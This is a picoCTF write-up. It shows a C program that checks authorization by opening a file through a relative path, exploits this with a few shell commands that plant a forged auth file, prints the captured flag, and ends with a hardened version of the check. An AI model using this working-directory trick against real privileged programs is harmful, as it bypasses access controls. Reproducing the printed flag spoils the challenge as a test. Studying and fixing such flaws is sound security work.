[picoCTF] Just No

picoCTF was long over, but I decided to work on some of the challenges just for practice anyways.  Just No was a quick and easy challenge, but I decided to write about it because the flaw is all too real.

justno.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char **argv){
    FILE* authf = fopen("../../problems/f934d9ca116fb6e3e89cc85baaca028c/auth","r"); //access auth file in ../../../problems/f934d9ca116fb6e3e89cc85baaca028c
    if(authf == NULL){
        printf("could not find auth file in ../../problems/f934d9ca116fb6e3e89cc85baaca028c/\n");
        return 0;
    }
    char auth[8];
    fgets(auth,8,authf);
    fclose(authf);
    if(strcmp(auth,"no")!=0){
        FILE* flagf;
        flagf = fopen("/problems/f934d9ca116fb6e3e89cc85baaca028c/flag","r");
        char flag[64];
        fgets(flag,64,flagf);
        printf("Oh. Well the auth file doesn't say no anymore so... Here's the flag: %s",flag);
        fclose(flagf);
    }else{
        printf("auth file says no. So no. Just... no.\n");
    }
    return 0;
}

Ok.  So it’s checking the contents of the “auth” file, which we don’t have write access to.  However, notice that it opens the file with a relative path and not an absolute path, so the path is resolved against whatever directory we run the program from.  So all we have to do is go to our home directory and create our own auth file.

cd ~
mkdir tmp1; cd tmp1; mkdir tmp2; cd tmp2
mkdir ../../problems; mkdir ../../problems/f934d9ca116fb6e3e89cc85baaca028c
echo hi > ../../problems/f934d9ca116fb6e3e89cc85baaca028c/auth
/problems/f934d9ca116fb6e3e89cc85baaca028c/justno

And…

Oh. Well the auth file doesn't say no anymore so... Here's the flag: 06265e758df65642853687376dab0ad6
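The fix is to stop trusting the working directory. The following is an added example, not code from the challenge or the original post: a hardened auth check that keeps the "anything but no" logic but refuses relative paths and validates the opened file. The names check_auth and AUTH_PATH, the placeholder path, and the ownership rule (root or the binary's effective uid) are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Placeholder path: a real build would hard-code the problem directory. */
#define AUTH_PATH "/problems/<problem-id>/auth"

/* Returns 1 if the file at `path` was read safely and does not say "no",
 * 0 if it says "no", and -1 if it was refused or unreadable (treat as deny). */
int check_auth(const char *path) {
    struct stat st;
    char auth[8] = {0};
    ssize_t n;
    int fd;

    /* Refuse anything resolved against the caller-controlled working directory. */
    if (path == NULL || path[0] != '/')
        return -1;

    /* O_NOFOLLOW: do not follow a symlink in the final path component. */
    fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;

    /* Validate the opened descriptor, not the name: regular file, owned by root
     * or the effective (binary owner) uid, not writable by group or others. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        (st.st_uid != 0 && st.st_uid != geteuid()) ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }

    n = read(fd, auth, sizeof(auth) - 1);
    close(fd);
    if (n < 0)
        return -1;
    auth[strcspn(auth, "\r\n")] = '\0';   /* compare without a trailing newline */
    return strcmp(auth, "no") != 0;
}

int main(void) {
    puts(check_auth(AUTH_PATH) == 1 ? "authorized" : "denied");
    return 0;
}
```

The caller should treat any result other than 1 as a denial, so a missing or tampered auth file fails closed.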
